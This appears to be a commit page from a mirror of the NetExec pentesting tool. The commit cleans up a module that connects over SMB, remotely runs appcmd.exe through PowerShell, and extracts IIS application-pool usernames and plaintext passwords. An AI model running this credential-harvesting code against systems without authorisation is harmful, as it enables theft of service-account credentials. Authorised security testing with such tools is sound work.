swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

clean up appcmd.py

main
Marshall Hallenbeck 2023-09-22 09:50:56 -04:00 committed by Marshall Hallenbeck
parent 28e25c560b
commit 6c68100c8a
1 changed files with 10 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
nxc/modules/appcmd.py
View File

@ -1,16 +1,15 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class NXCModule: class NXCModule:
""" """
Checks for credentials in IIS Application Pool configuration files using appcmd.exe. Checks for credentials in IIS Application Pool configuration files using appcmd.exe.
Module by Brandon Fisher @shad0wcntr0ller Module by Brandon Fisher @shad0wcntr0ller
""" """
name = 'iis' name = "iis"
description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe" description = "Checks for credentials in IIS Application Pool configuration files using appcmd.exe"
supported_protocols = ['smb'] supported_protocols = ["smb"]
opsec_safe = True opsec_safe = True
multiple_hosts = True multiple_hosts = True
@ -24,27 +23,24 @@ class NXCModule:
self.check_appcmd(context, connection) self.check_appcmd(context, connection)
def check_appcmd(self, context, connection): def check_appcmd(self, context, connection):
if not hasattr(connection, "has_run"):
if not hasattr(connection, 'has_run'):
connection.has_run = False connection.has_run = False
if connection.has_run: if connection.has_run:
return return
connection.has_run = True connection.has_run = True
try: try:
connection.conn.listPath('C$', '\\Windows\\System32\\inetsrv\\appcmd.exe') connection.conn.listPath("C$", "\\Windows\\System32\\inetsrv\\appcmd.exe")
self.execute_appcmd(context, connection) self.execute_appcmd(context, connection)
except: except Exception as e:
context.log.fail("appcmd.exe not found, this module is not applicable.") context.log.fail("appcmd.exe not found, this module is not applicable - {e}")
return return
def execute_appcmd(self, context, connection): def execute_appcmd(self, context, connection):
command = 'powershell -c "C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*"' command = "powershell -c 'C:\\windows\\system32\\inetsrv\\appcmd.exe list apppool /@t:*'"
context.log.info('Checking For Hidden Credentials With Appcmd.exe') context.log.info("Checking For Hidden Credentials With Appcmd.exe")
output = connection.execute(command, True) output = connection.execute(command, True)
lines = output.splitlines() lines = output.splitlines()
@ -55,14 +51,13 @@ class NXCModule:
credentials_set = set() credentials_set = set()
for line in lines: for line in lines:
if 'APPPOOL.NAME:' in line: if "APPPOOL.NAME:" in line:
apppool_name = line.split('APPPOOL.NAME:')[1].strip().strip('"') apppool_name = line.split("APPPOOL.NAME:")[1].strip().strip('"')
if "userName:" in line: if "userName:" in line:
username = line.split("userName:")[1].strip().strip('"') username = line.split("userName:")[1].strip().strip('"')
if "password:" in line: if "password:" in line:
password = line.split("password:")[1].strip().strip('"') password = line.split("password:")[1].strip().strip('"')
if apppool_name and username is not None and password is not None: if apppool_name and username is not None and password is not None:
current_credentials = (apppool_name, username, password) current_credentials = (apppool_name, username, password)
@ -76,7 +71,6 @@ class NXCModule:
else: else:
context.log.highlight(f"Username: {username}, Password: {password}") context.log.highlight(f"Username: {username}, Password: {password}")
username = None username = None
password = None password = None
apppool_name = None apppool_name = None